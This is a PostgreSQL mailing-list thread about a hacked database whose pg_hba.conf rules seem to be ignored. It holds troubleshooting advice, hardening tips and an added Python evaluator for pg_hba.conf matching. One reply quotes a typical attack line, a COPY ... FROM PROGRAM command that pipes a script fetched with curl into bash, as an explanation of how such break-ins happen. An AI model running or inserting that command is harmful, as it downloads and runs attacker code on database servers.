How to confirm the pg_hba.conf service is correctly working

Started by shing dong, over 4 years ago. 8 messages, general.
#1shing dong
s7eqs7eq@gmail.com

Hello all,

A while ago, our company had a Postgres DB that was hacked: someone logged in to the DB to
modify data.
We found that pg_hba.conf does not work.
Any IP or user can log in to the DB.

1. The rules in pg_hba.conf are almost invalid
2. pg_hba.conf is only useful for METHOD = trust
3. Checked SHOW hba_file; the file location is correct
4. select * from pg_hba_file_rules; checked, it is correct
5. DB version: PostgreSQL 10.19 on x86_64-pc-linux-gnu, compiled by gcc
(GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit

Even if you delete the text in pg_hba.conf
and keep only

host VJ VJ_USER 10.10.10.1/32 md5

after pg_ctl reload and a DB restart, any IP or user can still log in to the DB.

Please help: how can I check whether the pg_hba.conf service is defective?
If you need any information, I will provide it.

Thanks

#2Tom Lane
tgl@sss.pgh.pa.us
In reply to: shing dong (#1)
Re: How to confirm the pg_hba.conf service is correctly working

shing dong <s7eqs7eq@gmail.com> writes:

1. The rules in pg_hba.conf are almost invalid
2. pg_hba.conf is only useful for METHOD = trust
3. check SHOW hba_file; the file location is correct
4. select * from pg_hba_file_rules; checked is correct
5.DB version : PostgreSQL 10.19 on x86_64-pc-linux-gnu, compiled by gcc
(GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
Even if you delete the text in pg_hba.conf
Keep only
host VJ VJ_USER 10.10.10.1/32 md5
After pg_ctl reload and Restart DB , any ip, user still can log in to DB

It's hard to say where your mistake is, but probably the first
thing to check is whether you're really restarting the postmaster.
I'm wondering in particular if there's more than one PG instance
on the machine and you're reconfiguring or restarting the wrong
one. Other than that, retrace your steps carefully, because at
least one of the above statements must be wrong.

(I guess if you were feeling *really* paranoid, you could wonder
whether somebody replaced your postmaster executable with a hacked
version that doesn't apply any pg_hba checks. But pilot error
seems like a far more probable explanation.)

regards, tom lane

#3shing dong
s7eqs7eq@gmail.com
In reply to: Tom Lane (#2)
Re: How to confirm the pg_hba.conf service is correctly working

Dear Tom,

There is just one PG instance on the host.

I did an experiment.
When I remove PG and reinstall PG, the function of pg_hba works,
which shows that the location of pg_hba is right.

----- remove
yum remove postgresql*

--- install
yum -y install
https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

yum install postgresql10 postgresql10-server postgresql10-contrib
postgresql10-libs postgresql10-dev* -y

-----------
I have checked again that the content of pg_hba.conf and "select * from
pg_hba_file_rules" are consistent.

Yes, this question is very tricky.

Tom Lane <tgl@sss.pgh.pa.us> wrote on Tue, Dec 21, 2021 at 10:42 PM:


#4David G. Johnston
david.g.johnston@gmail.com
In reply to: shing dong (#3)
Re: How to confirm the pg_hba.conf service is correctly working

Please don't top post; the convention here is to inline or bottom post and
trim unnecessary quoting.

On Tue, Dec 21, 2021 at 9:24 PM shing dong <s7eqs7eq@gmail.com> wrote:

----- remove
yum remove postgresql*

--- install
yum -y install
https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

yum install postgresql10 postgresql10-server postgresql10-contrib
postgresql10-libs postgresql10-dev* -y

Frankly, if you did this and you are still seeing errors, start over on a
fresh, never hacked, machine. Test that the new machine is secure then
restore your backup into it.

-----------

I have Check again the content of pg_hba.conf and "select * from
pg_hba_file_rules" consistent

If you want to continue having a public debugging session (on the problem
machine) I suggest that you perform all queries and inspect all files using
a terminal and then provide, with some light editing only, a copy of the
terminal transcript for evaluation.

You may wish to stand up a clean machine (VM or otherwise) for debugging,
just to ensure that your experiments produce the expected results.

David J.

#5Dave Cramer
pg@fastcrypt.com
In reply to: shing dong (#1)
Re: How to confirm the pg_hba.conf service is correctly working

On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:

Dear Dave,

The result after reload is

2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35
-04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""

No other error message

------------------------------------------

result of select * from pg_hba_file_rules

line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,

95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,

96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,

Hmmm for some reason I did not reply to the list.

At any rate.

Your original post stated that you only had

host VJ VJ_USER 10.10.10.1/32 md5

in the pg_hba.conf file.

However, the result of the select is considerably more?

Dave Cramer

#6shing dong
s7eqs7eq@gmail.com
In reply to: Dave Cramer (#5)
Re: How to confirm the pg_hba.conf service is correctly working

Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However, the result of the select is considerably more?

Dear Dave,

I have tested this feature with only

host VJ VJ_USER 10.10.10.1/32 md5

in the pg_hba.conf file.

I have checked that the select * from pg_hba_file_rules results are consistent with
pg_hba.conf.

Any IP and user can still log in to the DB.

When I remove the PG software and reinstall the PG software, the function of
pg_hba works, which shows that the location and content of pg_hba.conf
are correct.

I suspect that the function of pg_hba is destroyed?

Dave Cramer <davecramer@postgres.rocks> wrote on Wed, Dec 22, 2021 at 6:58 PM:


#7Imre Samu
pella.samu@gmail.com
In reply to: shing dong (#6)
Re: How to confirm the pg_hba.conf service is correctly working

I have checked that the select * from pg_hba_file_rules results are consistent with
pg_hba.conf

Any IP and user can still log in to the DB

Any proxy? Port/IP forwarding running in the background?

Next time, check the "client_addr":
- SELECT usename, client_addr FROM pg_stat_activity WHERE client_addr IS
NOT NULL;

a Postgres DB that was hacked
When I remove the PG software and reinstall the PG software

I agree with the others:
- please re-install the full system! (not just PostgreSQL!)

Usually the attack sequence is:
- open port, brute-force attack + COPY ... FROM PROGRAM 'curl
http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" to be installed and running hidden in the background.

https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0
(2020.Mar)
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/

host VJ VJ_USER 10.10.10.1/32 md5

IMHO:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administration, use SSH tunnels:
https://www.postgresql.org/docs/10/ssh-tunnels.html (and use a firewall
to close all external ports, or use SSL)

Regards,
Imre

shing dong <s7eqs7eq@gmail.com> wrote (on Thu, Dec 23, 2021 at
11:15):

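The two checks Imre asks for, pg_hba_file_rules and pg_stat_activity.client_addr, only make sense together once you see how PostgreSQL walks the file: the first line whose type, database, user and client address all match is the one that is applied, and nothing after it is consulted, even if authentication on that line then fails. The following is an added example written for this page, not code from the thread or from PostgreSQL. It is an offline evaluator for the common pg_hba.conf rule forms (the +group, @file, samehost/samenet and options syntax is deliberately left out), run against a constructed file that contains the local and 127.0.0.1 rules from lines 84 and 86 of the poster's pg_hba_file_rules output plus the single rule the poster tested with. It shows that a client at an unlisted address gets no entry at all, and that the same client arriving through a proxy or port forwarder running on the DB host is seen as 127.0.0.1 and is matched by the catch-all line instead of its own; that is exactly why client_addr is the column to look at. It also flags the md5 lines Imre suggests moving to scram-sha-256. Note what it does not show: an md5 line still demands a password, so a forwarder by itself does not explain "any user can log in", and the evaluator models the file, not the running binary, so it cannot rule out the replaced-postmaster case Tom raised.

```python
"""Offline first-match evaluator for pg_hba.conf rules.

Added example, not code from this thread or from PostgreSQL. Mirrors the
documented matching order (first matching line wins, no fall-through) for
the common rule forms; +group, @file, samehost/samenet and the options
column are intentionally not handled.
"""
import ipaddress
from typing import FrozenSet, List, NamedTuple, Optional, Union


class HbaRule(NamedTuple):
    line_number: int
    type: str                                  # local | host | hostssl | hostnossl
    databases: FrozenSet[str]
    users: FrozenSet[str]
    network: Optional[Union[ipaddress.IPv4Network, ipaddress.IPv6Network]]  # None: local
    method: str


def parse_hba(text: str) -> List[HbaRule]:
    """Parse pg_hba.conf text; line numbers match what pg_hba_file_rules reports."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":
            typ, db, user, method = fields[:4]
            network = None
        else:
            typ, db, user, addr = fields[:4]
            if "/" in addr:                        # CIDR form: 10.10.10.1/32
                network, method = ipaddress.ip_network(addr, strict=False), fields[4]
            else:                                  # address + netmask columns
                network = ipaddress.ip_network(f"{addr}/{fields[4]}", strict=False)
                method = fields[5]
        rules.append(HbaRule(lineno, typ, frozenset(db.split(",")),
                             frozenset(user.split(",")), network, method))
    return rules


def first_match(rules, database, user, addr=None, ssl=False, replication=False):
    """Return the rule PostgreSQL would apply, or None ("no pg_hba.conf entry").

    addr=None models a Unix-socket connection. Otherwise addr is the client
    address as the server sees it: behind a proxy or port forwarder on the
    DB host that is 127.0.0.1, whatever the real client's address is.
    """
    client = ipaddress.ip_address(addr) if addr is not None else None
    for r in rules:
        if client is None:
            if r.type != "local":
                continue
        else:
            if r.type == "local" or client not in r.network:
                continue
            if (r.type == "hostssl" and not ssl) or (r.type == "hostnossl" and ssl):
                continue
        if replication:                            # 'all' never covers replication
            if "replication" not in r.databases:
                continue
        elif "all" not in r.databases and database not in r.databases:
            continue
        if "all" not in r.users and user not in r.users:
            continue
        return r
    return None


def weak_rules(rules):
    """Flag lines a reviewer would change: trust/password, md5, catch-all networks."""
    findings = []
    for r in rules:
        if r.method == "trust":
            findings.append((r.line_number, "trust: no authentication at all"))
        elif r.method in ("md5", "password"):
            findings.append((r.line_number, f"{r.method}: change to scram-sha-256"))
        if r.network is not None and r.network.prefixlen == 0:
            findings.append((r.line_number, f"{r.network}: matches every client"))
    return findings


# Constructed sample, not the poster's file: the 'local' and 127.0.0.1 rules
# seen on lines 84 and 86 of the pg_hba_file_rules output above, plus the
# single rule the poster tested with.
SAMPLE_HBA = """\
# TYPE  DATABASE  USER     ADDRESS         METHOD
local   all       all                      md5
host    all       all      127.0.0.1/32    md5
host    VJ        VJ_USER  10.10.10.1/32   md5
"""


def demo():
    rules = parse_hba(SAMPLE_HBA)
    return {
        "direct_unlisted": first_match(rules, "VJ", "VJ_USER", "203.0.113.7"),   # None
        "direct_listed": first_match(rules, "VJ", "VJ_USER", "10.10.10.1"),      # line 4
        "via_local_forwarder": first_match(rules, "VJ", "VJ_USER", "127.0.0.1"), # line 3
        "unix_socket": first_match(rules, "postgres", "postgres"),               # line 2
    }


if __name__ == "__main__":
    for name, rule in demo().items():
        print(name, "->", "no entry" if rule is None else f"line {rule.line_number}")
    for lineno, why in weak_rules(parse_hba(SAMPLE_HBA)):
        print(f"line {lineno}: {why}")
```

On a live server the same comparison is `SELECT * FROM pg_hba_file_rules` next to `SELECT usename, client_addr FROM pg_stat_activity WHERE client_addr IS NOT NULL`; if sessions you expect to come from remote hosts show up with a client_addr of 127.0.0.1, something on the DB host is forwarding them, and the 127.0.0.1 line, not the per-host lines, is what governs them.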

#8Vijaykumar Jain
vijaykumarjain.github@gmail.com
In reply to: shing dong (#6)
Re: How to confirm the pg_hba.conf service is correctly working

On Thu, 23 Dec 2021 at 15:45, shing dong <s7eqs7eq@gmail.com> wrote:

I have tested this feature with only

host VJ VJ_USER 10.10.10.1/32 md5

in the pg_hba.conf file

I may be a bit off, but can you try a couple of things other than a fresh
install, in case you have time to debug more?

Is it possible to snapshot the VM and set it up in a controlled
environment where you can play around with incoming connections at the
network layer beyond the VM?
With that, is it possible for you to use gdb and debug a connection to the
postmaster?
You can set it up using the below:
Getting a stack trace of a running PostgreSQL backend on Linux/BSD -
PostgreSQL wiki
<https://wiki.postgresql.org/wiki/Getting_a_stack_trace_of_a_running_PostgreSQL_backend_on_Linux/BSD>

Then you can put a breakpoint at this function and check the input
lines it gets for parsing:
https://github.com/postgres/postgres/blob/6ab42ae36713b1e6f961c37e22f99d3e6267523b/src/backend/libpq/hba.c#L779

postgres/hba.c at 6ab42ae36713b1e6f961c37e22f99d3e6267523b ·
postgres/postgres (github.com)
<https://github.com/postgres/postgres/blob/6ab42ae36713b1e6f961c37e22f99d3e6267523b/src/backend/libpq/hba.c#L1438>

Maybe this helps identify why other IPs are being allowed.
To be more paranoid, you can add a reject rule for the IP you are trying to make
a connection from, and trace that specific rule.

This might be overkill and maybe a waste of effort given you already can
query the hba view, but in case you want to try it out.